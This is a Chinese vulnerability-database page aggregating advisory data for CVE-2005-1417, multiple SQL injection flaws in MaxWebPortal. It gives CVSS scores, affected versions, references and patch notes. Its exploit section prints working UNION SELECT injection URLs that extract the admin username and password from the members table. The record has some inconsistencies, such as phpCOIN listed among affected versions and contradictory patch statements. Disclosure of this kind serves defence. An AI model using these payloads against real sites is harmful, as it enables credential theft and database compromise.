CVE-2005-1417
CVSS7.5
发布时间 :2005-05-03 00:00:00
修订时间 :2008-09-05 16:49:05
NMCOS    

[原文]Multiple SQL injection vulnerabilities in MaxWebPortal 2.x, 1.35, and other versions allow remote attackers to execute arbitrary SQL commands via (1) article_popular.asp, (2) arguments to dl_popular.asp, (3) arguments to links_popular.asp, (4) arguments to pic_popular.asp, (5) article_rate.asp, (6) dl_rate.asp, (7) links_rate.asp, (8) pic_rates.asp, (9) article_toprated.asp, (10) dl_toprated.asp, (11) links_toprated.asp, (12) arguments to pic_toprated.asp, or (13) the TOPIC_ID or Forum_ID parameters to custom_link.asp.


[CNNVD]MaxWebPortal多个SQL注入漏洞(CNNVD-200505-886)

        MaxWebPortal 2.x、1.35及其他版本存在多个SQL注入漏洞,远程攻击者可以通过(1)article_popular.asp,(2)传给dl_popular.asp的参数,(3)传给links_popular.asp的参数,(4)传给pic_popular.asp的参数,(5)article_rate.asp,(6) dl_rate.asp,(7)links_rate.asp,(8)pic_rates.asp,(9)article_toprated.asp,(10)dl_toprated.asp,(11)links_toprated.asp,(12)传给pic_toprated.asp的参数或者(13)传给custom_link.asp的TOPIC_ID或Forum_ID参数,来执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:maxwebportal:maxwebportal:1.3.1
cpe:/a:maxwebportal:maxwebportal:1.3.5
cpe:/a:maxwebportal:maxwebportal:2.0
cpe:/a:maxwebportal:maxwebportal:1.3.2
cpe:/a:maxwebportal:maxwebportal:1.3.3
cpe:/a:maxwebportal:maxwebportal:1.3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1417
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1417
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-886
(官方数据源) CNNVD

- 其它链接及资源

http://www.maxwebportal.info/downloads/mwp_security_fixes.zip
(PATCH)  CONFIRM  http://www.maxwebportal.info/downloads/mwp_security_fixes.zip
http://www.securityfocus.com/bid/13466
(UNKNOWN)  BID  13466
http://securitytracker.com/id?1013845
(UNKNOWN)  SECTRACK  1013845
http://secunia.com/advisories/15214
(UNKNOWN)  SECUNIA  15214
http://www.maxwebportal.info/topic.asp?TOPIC_ID=2482&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat&Topic_Title=Security+Update
(UNKNOWN)  CONFIRM  http://www.maxwebportal.info/topic.asp?TOPIC_ID=2482&FORUM_ID=1&CAT_ID=1&Forum_Title=General+Chat&Topic_Title=Security+Update

- 漏洞信息

MaxWebPortal多个SQL注入漏洞
高危 SQL注入
2005-05-03 00:00:00 2005-10-20 00:00:00
远程  
        MaxWebPortal 2.x、1.35及其他版本存在多个SQL注入漏洞,远程攻击者可以通过(1)article_popular.asp,(2)传给dl_popular.asp的参数,(3)传给links_popular.asp的参数,(4)传给pic_popular.asp的参数,(5)article_rate.asp,(6) dl_rate.asp,(7)links_rate.asp,(8)pic_rates.asp,(9)article_toprated.asp,(10)dl_toprated.asp,(11)links_toprated.asp,(12)传给pic_toprated.asp的参数或者(13)传给custom_link.asp的TOPIC_ID或Forum_ID参数,来执行任意SQL命令。

- 公告与补丁

        暂无数据

- 漏洞信息

16306
MaxWebPortal article_popular.asp SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown Vendor Verified

- 漏洞描述

MaxWebPortal contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to an unspecified variable in the 'article_popular.asp' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2005-04-27 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, MaxWebPortal.com has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

MaxWebPortal Multiple SQL Injection Vulnerabilities
Input Validation Error 13466
Yes No
2005-05-02 12:00:00 2009-07-12 02:06:00
Discovery of these vulnerabilities is credited to s-dalili" <s-dalili@sbu.ac.ir>.

- 受影响的程序版本

phpCOIN phpCOIN 1.2.1 b
phpCOIN phpCOIN 1.2.1
phpCOIN phpCOIN 1.2
MaxWebPortal MaxWebPortal 1.33
MaxWebPortal MaxWebPortal 1.32
MaxWebPortal MaxWebPortal 1.31
MaxWebPortal MaxWebPortal 1.30

- 漏洞讨论

MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

- 漏洞利用

No exploit is required. The following examples are available:

Get Username=Admin password: (if I didn't write some of them, you can make
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
---------------
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
some another Sql injections are:
custom_link.asp?method=Topic&amp;TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&amp;Forum_ID=[Sql inject]

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站